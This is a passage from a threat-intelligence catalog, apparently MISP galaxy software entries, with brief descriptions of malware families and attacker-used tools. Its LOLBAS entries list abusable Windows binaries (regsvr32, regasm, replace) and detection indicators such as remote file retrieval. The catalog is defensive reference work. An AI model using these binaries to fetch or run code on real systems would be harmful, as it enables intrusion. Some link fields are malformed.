The FIENDCRY component is a memory scraper based on MemPDump that scans through process memory looking for regular expressions. Its stage 1 component scans all processes, and its stage 2 component targets a specific process of interest. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[Github Mempdump](https://app.tidalcyber.com/references/f830ed8b-33fa-4d1e-a66c-41f8c6aba69c)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:software="FIENDCRY - Associated Software"

DUEBREW - Associated Software

The DUEBREW component is a Perl2Exe binary launcher. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:software="DUEBREW - Associated Software"

DRIFTWOOD - Associated Software

The DRIFTWOOD component is a Perl2Exe compiled Perl script used by G0053 after they have identified data of interest on victims. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:software="DRIFTWOOD - Associated Software"

RawPOS

[RawPOS](https://app.tidalcyber.com/software/6ea1bf95-fed8-4b94-8071-aa19a3af5e34) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. <sup>[[Kroll RawPOS Jan 2017](https://app.tidalcyber.com/references/cbbfffb9-c378-4e57-a2af-e76e6014ed57)]</sup> <sup>[[TrendMicro RawPOS April 2015](https://app.tidalcyber.com/references/e483ed86-713b-42c6-ad77-e9b889bbcb81)]</sup> <sup>[[Visa RawPOS March 2015](https://app.tidalcyber.com/references/a2371f44-0a88-4d68-bbe7-7e79f13f78c2)]</sup> FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup> <sup>[[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]</sup>

The tag is: misp-galaxy:software="RawPOS"

Rclone

[Rclone](https://app.tidalcyber.com/software/1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://app.tidalcyber.com/software/1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) and DarkSide Ransomware-as-a-Service operations.<sup>[[Rclone](https://app.tidalcyber.com/references/3c7824de-d958-4254-beec-bc4e5ab989b0)]</sup><sup>[[Rclone Wars](https://app.tidalcyber.com/references/d47e5f7c-cf70-4f7c-ac83-57e4e1187485)]</sup><sup>[[Detecting Rclone](https://app.tidalcyber.com/references/2e44290c-32f5-4e7f-96de-9874df79fe89)]</sup><sup>[[DarkSide Ransomware Gang](https://app.tidalcyber.com/references/5f8d49e8-22da-425f-b63b-a799b97ec2b5)]</sup><sup>[[DFIR Conti Bazar Nov 2021](https://app.tidalcyber.com/references/a6f1a15d-448b-41d4-81f0-ee445cba83bd)]</sup>

The tag is: misp-galaxy:software="Rclone"

RCSession

[RCSession](https://app.tidalcyber.com/software/38c4d208-fe38-4965-871c-709fa1479ba3) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://app.tidalcyber.com/groups/4a4641b1-7686-49da-8d83-00d8013f4b47) and by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) (Type II Backdoor).<sup>[[Secureworks BRONZE PRESIDENT December 2019](https://app.tidalcyber.com/references/019889e0-a2ce-476f-9a31-2fc394de2821)]</sup><sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup><sup>[[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]</sup>

The tag is: misp-galaxy:software="RCSession"

rcsi.exe - Associated Software

<sup>[[rcsi.exe - LOLBAS Project](/references/dc02058a-7ed3-4253-a976-6f99b9e91406)]</sup>

The tag is: misp-galaxy:software="rcsi.exe - Associated Software"

rcsi

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Non-Interactive command line inerface included with Visual Studio.

Author: Oddvar Moe

Paths: * no default

The tag is: misp-galaxy:software="rcsi"

RDAT

[RDAT](https://app.tidalcyber.com/software/567da30e-fd4d-4ec5-a308-bf08788f3bfb) is a backdoor used by the suspected Iranian threat group [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2). [RDAT](https://app.tidalcyber.com/software/567da30e-fd4d-4ec5-a308-bf08788f3bfb) was originally identified in 2017 and targeted companies in the telecommunications sector.<sup>[[Unit42 RDAT July 2020](https://app.tidalcyber.com/references/2929baa5-ead7-4936-ab67-c4742afc473c)]</sup>

The tag is: misp-galaxy:software="RDAT"

RDFSNIFFER

[RDFSNIFFER](https://app.tidalcyber.com/software/ca4e973c-da15-46a9-8f3a-0b1560c9a783) is a module loaded by [BOOSTWRITE](https://app.tidalcyber.com/software/74a73624-d53b-4c84-a14b-8ae964fd577c) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.<sup>[[FireEye FIN7 Oct 2019](https://app.tidalcyber.com/references/df8886d1-fbd7-4c24-8ab1-6261923dee96)]</sup>

The tag is: misp-galaxy:software="RDFSNIFFER"

RDP Recognizer

RDP Recognizer is a tool that can be used to brute force RDP passwords and check for RDP vulnerabilities. U.S. authorities observed BianLian Ransomware Group actors downloading the tool during intrusions.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="RDP Recognizer"

rdrleakdiag.exe - Associated Software

<sup>[[rdrleakdiag.exe - LOLBAS Project](/references/1feff728-2230-4a45-bd64-6093f8b42646)]</sup>

The tag is: misp-galaxy:software="rdrleakdiag.exe - Associated Software"

rdrleakdiag

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Windows resource leak diagnostic tool

Author: John Dwyer

Paths: * c:\windows\system32\rdrleakdiag.exe * c:\Windows\SysWOW64\rdrleakdiag.exe

The tag is: misp-galaxy:software="rdrleakdiag"

Reaver

[Reaver](https://app.tidalcyber.com/software/ca544771-d43e-4747-80e5-cf0f4a4836f3) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://app.tidalcyber.com/technique/b5cc9ab3-6501-4c50-904e-1a25a4088125) items.<sup>[[Palo Alto Reaver Nov 2017](https://app.tidalcyber.com/references/69fbe527-2ec4-457b-81b1-2eda65eb8442)]</sup>

The tag is: misp-galaxy:software="Reaver"

BUGJUICE - Associated Software

Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named BUGJUICE by FireEye is likely the same as the malware RedLeaves. <sup>[[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]</sup> <sup>[[Twitter Nick Carr APT10](https://app.tidalcyber.com/references/0f133f2c-3b02-4b3b-a960-ef6a7862cf8f)]</sup>

The tag is: misp-galaxy:software="BUGJUICE - Associated Software"

RedLeaves

[RedLeaves](https://app.tidalcyber.com/software/5264c3ab-14e1-4ae1-854e-889ebde029b4) is a malware family used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). The code overlaps with [PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10) and may be based upon the open source tool Trochilus. <sup>[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]</sup> <sup>[[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]</sup>

The tag is: misp-galaxy:software="RedLeaves"

reg.exe - Associated Software

The tag is: misp-galaxy:software="reg.exe - Associated Software"

Reg

[Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. <sup>[[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)]</sup>

Utilities such as [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) are known to be used by persistent threats. <sup>[[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)]</sup>

The tag is: misp-galaxy:software="Reg"

Regasm.exe - Associated Software

<sup>[[LOLBAS Regasm](/references/b6a3356f-72c2-4ec2-a276-2432eb691055)]</sup>

The tag is: misp-galaxy:software="Regasm.exe - Associated Software"

Regasm

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Part of .NET

Author: Oddvar Moe

Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe

The tag is: misp-galaxy:software="Regasm"

RegDuke

[RegDuke](https://app.tidalcyber.com/software/52dc08d8-82cc-46dc-91ae-383193d72963) is a first stage implant written in .NET and used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2017. [RegDuke](https://app.tidalcyber.com/software/52dc08d8-82cc-46dc-91ae-383193d72963) has been used to control a compromised machine when control of other implants on the machine was lost.<sup>[[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)]</sup>

The tag is: misp-galaxy:software="RegDuke"

Regedit.exe - Associated Software

<sup>[[Regedit.exe - LOLBAS Project](/references/86e47198-751b-4754-8741-6dd8f2960416)]</sup>

The tag is: misp-galaxy:software="Regedit.exe - Associated Software"

Regedit

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to manipulate registry

Author: Oddvar Moe

Paths: * C:\Windows\regedit.exe

Detection: * Sigma: [proc_creation_win_regedit_import_keys_ads.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml) * IOC: regedit.exe reading and writing to alternate data stream * IOC: regedit.exe should normally not be executed by end-users<sup>[[Regedit.exe - LOLBAS Project](/references/86e47198-751b-4754-8741-6dd8f2960416)]</sup>

The tag is: misp-galaxy:software="Regedit"

Regin

[Regin](https://app.tidalcyber.com/software/e88bf527-bb9c-45c3-b86b-04a07dcd91fd) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://app.tidalcyber.com/software/e88bf527-bb9c-45c3-b86b-04a07dcd91fd) timestamps date back to 2003. <sup>[[Kaspersky Regin](https://app.tidalcyber.com/references/1b521b76-5b8f-4bd9-b312-7c795fc97898)]</sup>

The tag is: misp-galaxy:software="Regin"

Regini.exe - Associated Software

<sup>[[Regini.exe - LOLBAS Project](/references/db2573d2-6ecd-4c5a-b038-2f799f9723ae)]</sup>

The tag is: misp-galaxy:software="Regini.exe - Associated Software"

Regini

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to manipulate the registry

Author: Oddvar Moe

Paths: * C:\Windows\System32\regini.exe * C:\Windows\SysWOW64\regini.exe

Detection: * Sigma: [proc_creation_win_regini_ads.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml) * Sigma: [proc_creation_win_regini_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml) * IOC: regini.exe reading from ADS<sup>[[Regini.exe - LOLBAS Project](/references/db2573d2-6ecd-4c5a-b038-2f799f9723ae)]</sup>

The tag is: misp-galaxy:software="Regini"

Register-cimprovider.exe - Associated Software

<sup>[[Register-cimprovider.exe - LOLBAS Project](/references/d445d016-c4f1-45c8-929d-913867275417)]</sup>

The tag is: misp-galaxy:software="Register-cimprovider.exe - Associated Software"

Register-cimprovider

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to register new wmi providers

Author: Oddvar Moe

Paths: * C:\Windows\System32\Register-cimprovider.exe * C:\Windows\SysWOW64\Register-cimprovider.exe

Detection: * Sigma: [proc_creation_win_susp_register_cimprovider.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml) * IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious<sup>[[Register-cimprovider.exe - LOLBAS Project](/references/d445d016-c4f1-45c8-929d-913867275417)]</sup>

The tag is: misp-galaxy:software="Register-cimprovider"

Regsvcs.exe - Associated Software

<sup>[[LOLBAS Regsvcs](/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]</sup>

The tag is: misp-galaxy:software="Regsvcs.exe - Associated Software"

Regsvcs

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies

Author: Oddvar Moe

Paths: * c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe * c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe

Detection: * Sigma: [proc_creation_win_lolbin_regasm.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml) * Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml) * Splunk: [detect_regsvcs_with_network_connection.yml]([LOLBAS Regsvcs(/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]</sup>

The tag is: misp-galaxy:software="Regsvcs"

Regsvr32.exe - Associated Software

<sup>[[LOLBAS Regsvr32](/references/8e32abef-534e-475a-baad-946b6ec681c1)]</sup>

The tag is: misp-galaxy:software="Regsvr32.exe - Associated Software"

Regsvr32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to register dlls

Author: Oddvar Moe

Paths: * C:\Windows\System32\regsvr32.exe * C:\Windows\SysWOW64\regsvr32.exe

Detection: * Sigma: [proc_creation_win_regsvr32_susp_parent.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml) * Sigma: [proc_creation_win_regsvr32_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml) * Sigma: [proc_creation_win_regsvr32_susp_exec_path_1.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml) * Sigma: [proc_creation_win_regsvr32_network_pattern.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml) * Sigma: [net_connection_win_regsvr32_network_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml) * Sigma: [dns_query_win_regsvr32_network_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml) * Sigma: [proc_creation_win_regsvr32_flags_anomaly.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml) * Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml) * Splunk: [detect_regsvr32_application_control_bypass.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml) * Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml) * Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml) * IOC: regsvr32.exe retrieving files from Internet * IOC: regsvr32.exe executing scriptlet (sct) files * IOC: DotNet CLR libraries loaded into regsvr32.exe * IOC: DotNet CLR Usage Log - regsvr32.exe.log<sup>[[LOLBAS Regsvr32](/references/8e32abef-534e-475a-baad-946b6ec681c1)]</sup>

The tag is: misp-galaxy:software="Regsvr32"

Remcos

[Remcos](https://app.tidalcyber.com/software/2eb92fa8-514e-4018-adc4-c9fe4f082567) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://app.tidalcyber.com/software/2eb92fa8-514e-4018-adc4-c9fe4f082567) has been observed being used in malware campaigns.<sup>[[Riskiq Remcos Jan 2018](https://app.tidalcyber.com/references/a641a41c-dcd8-47e5-9b29-109dd2eb7f1e)]</sup><sup>[[Talos Remcos Aug 2018](https://app.tidalcyber.com/references/c5cb2eff-ed48-47ff-bfd6-79152bf51430)]</sup>

The tag is: misp-galaxy:software="Remcos"

Remexi

[Remexi](https://app.tidalcyber.com/software/82d0bb4d-4711-49e3-9fe5-c522bbe5e8bb) is a Windows-based Trojan that was developed in the C programming language.<sup>[[Securelist Remexi Jan 2019](https://app.tidalcyber.com/references/07dfd8e7-4e51-4c6e-a4f6-aaeb74ff8845)]</sup>

The tag is: misp-galaxy:software="Remexi"

Remote.exe - Associated Software

<sup>[[Remote.exe - LOLBAS Project](/references/9a298f83-80b8-45a3-9f63-6119be6621b4)]</sup>

The tag is: misp-galaxy:software="Remote.exe - Associated Software"

Remote

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Debugging tool included with Windows Debugging Tools

Author: mr.d0x

Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe

Detection: * IOC: remote.exe process spawns * Sigma: [proc_creation_win_lolbin_remote.yml]([Remote.exe - LOLBAS Project(/references/9a298f83-80b8-45a3-9f63-6119be6621b4)]</sup>

The tag is: misp-galaxy:software="Remote"

RemoteCMD

[RemoteCMD](https://app.tidalcyber.com/software/57fa64ea-975a-470a-a194-3428148ae9ee) is a custom tool used by [APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9) to execute commands on a remote system similar to SysInternal’s PSEXEC functionality. <sup>[[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]</sup>

The tag is: misp-galaxy:software="RemoteCMD"

RemoteUtilities

[RemoteUtilities](https://app.tidalcyber.com/software/8a7fa0df-c688-46be-94bf-462fae33b788) is a legitimate remote administration tool that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least 2021 for execution on target machines.<sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:software="RemoteUtilities"

ProjectSauron - Associated Software

ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. <sup>[[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)]</sup>

The tag is: misp-galaxy:software="ProjectSauron - Associated Software"

Backdoor.Remsec - Associated Software

The tag is: misp-galaxy:software="Backdoor.Remsec - Associated Software"

Remsec

[Remsec](https://app.tidalcyber.com/software/e3729cff-f25e-4c01-a7a1-e8b83e903b30) is a modular backdoor that has been used by [Strider](https://app.tidalcyber.com/groups/deb573c6-071a-4b50-9e92-4aa648d8bdc1) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. <sup>[[Symantec Strider Blog](https://app.tidalcyber.com/references/664eac41-257f-4d4d-aba5-5d2e8e2117a7)]</sup>

The tag is: misp-galaxy:software="Remsec"

Replace.exe - Associated Software

<sup>[[Replace.exe - LOLBAS Project](/references/82a473e9-208c-4c47-bf38-92aee43238dd)]</sup>

The tag is: misp-galaxy:software="Replace.exe - Associated Software"

Replace

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to replace file with another file

Author: Oddvar Moe

Paths: * C:\Windows\System32\replace.exe * C:\Windows\SysWOW64\replace.exe

Detection: * IOC: Replace.exe retrieving files from remote server * Sigma: [proc_creation_win_lolbin_replace.yml]([Replace.exe - LOLBAS Project(/references/82a473e9-208c-4c47-bf38-92aee43238dd)]</sup>

The tag is: misp-galaxy:software="Replace"

Responder

Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. <sup>[[GitHub Responder](https://app.tidalcyber.com/references/3ef681a9-4ab0-420b-9d1a-b8152c50b3ca)]</sup>

The tag is: misp-galaxy:software="Responder"

Revenge RAT

[Revenge RAT](https://app.tidalcyber.com/software/f99712b4-37a2-437c-92d7-fb4f94a1f892) is a freely available remote access tool written in .NET (C#).<sup>[[Cylance Shaheen Nov 2018](https://app.tidalcyber.com/references/57802e46-e12c-4230-8d1c-08854a0de06a)]</sup><sup>[[Cofense RevengeRAT Feb 2019](https://app.tidalcyber.com/references/3abfc3eb-7f9d-49e5-8048-4118cde3122e)]</sup>

The tag is: misp-galaxy:software="Revenge RAT"

Sodinokibi - Associated Software

The tag is: misp-galaxy:software="Sodinokibi - Associated Software"

Sodin - Associated Software

The tag is: misp-galaxy:software="Sodin - Associated Software"

REvil

[REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.<sup>[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)]</sup><sup>[[Intel 471 REvil March 2020](https://app.tidalcyber.com/references/b939dc98-e00e-4d47-84a4-3eaaeb5c0abf)]</sup><sup>[[Group IB Ransomware May 2020](https://app.tidalcyber.com/references/18d20965-f1f4-439f-a4a3-34437ad1fe14)]</sup>

The tag is: misp-galaxy:software="REvil"

RGDoor

[RGDoor](https://app.tidalcyber.com/software/d5649d69-52d4-4198-9683-b250348dea32) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://app.tidalcyber.com/software/d5649d69-52d4-4198-9683-b250348dea32) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://app.tidalcyber.com/software/d5649d69-52d4-4198-9683-b250348dea32) provides backdoor access to compromised IIS servers. <sup>[[Unit 42 RGDoor Jan 2018](https://app.tidalcyber.com/references/94b37da6-f808-451e-8f2d-5df0e93358ca)]</sup>

The tag is: misp-galaxy:software="RGDoor"

Rifdoor

The tag is: misp-galaxy:software="Rifdoor"

Rising Sun

[Rising Sun](https://app.tidalcyber.com/software/19b1f1c8-5ef3-4328-b605-38e0bafc084d) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://app.tidalcyber.com/campaigns/57e858c8-fd0b-4382-a178-0165d03aa8a9) between 2017 and 2019. [Rising Sun](https://app.tidalcyber.com/software/19b1f1c8-5ef3-4328-b605-38e0bafc084d) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://app.tidalcyber.com/software/19b1f1c8-5ef3-4328-b605-38e0bafc084d) included some source code from [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08)'s Trojan Duuzer.<sup>[[McAfee Sharpshooter December 2018](https://app.tidalcyber.com/references/96b6d012-8620-4ef5-bf9a-5f88e465a495)]</sup>

The tag is: misp-galaxy:software="Rising Sun"

ROADTools

[ROADTools](https://app.tidalcyber.com/software/15bc8e94-64d1-4f1f-bc99-08cfbac417dc) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.<sup>[[ROADtools Github](https://app.tidalcyber.com/references/90c592dc-2c9d-401a-96ab-b539f7522956)]</sup>

The tag is: misp-galaxy:software="ROADTools"

RobbinHood

[RobbinHood](https://app.tidalcyber.com/software/b65956ef-439a-463d-b85e-6606467f508a) is ransomware that was first observed being used in an attack against the Baltimore city government’s computer network.<sup>[[CarbonBlack RobbinHood May 2019](https://app.tidalcyber.com/references/cb9e49fa-253a-447a-9c88-c6e507bae0bb)]</sup><sup>[[BaltimoreSun RobbinHood May 2019](https://app.tidalcyber.com/references/f578de81-ea6b-49d0-9a0a-111e07249cd8)]</sup>

The tag is: misp-galaxy:software="RobbinHood"

ROCKBOOT

The tag is: misp-galaxy:software="ROCKBOOT"

RogueRobin

The tag is: misp-galaxy:software="RogueRobin"

ROKRAT

[ROKRAT](https://app.tidalcyber.com/software/a3479628-af0b-4088-8d2a-fafa384731dd) is a cloud-based remote access tool (RAT) used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) to target victims in South Korea. [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) has used ROKRAT during several campaigns from 2016 through 2021.<sup>[[Talos ROKRAT](https://app.tidalcyber.com/references/1bd78a2f-2bc6-426f-ac9f-16bf3fdf4cdf)]</sup><sup>[[Talos Group123](https://app.tidalcyber.com/references/bf8b2bf0-cca3-437b-a640-715f9cc945f7)]</sup><sup>[[Volexity InkySquid RokRAT August 2021](https://app.tidalcyber.com/references/bff1667b-3f87-4653-bd17-b675e997baf1)]</sup>

The tag is: misp-galaxy:software="ROKRAT"

RotaJakiro

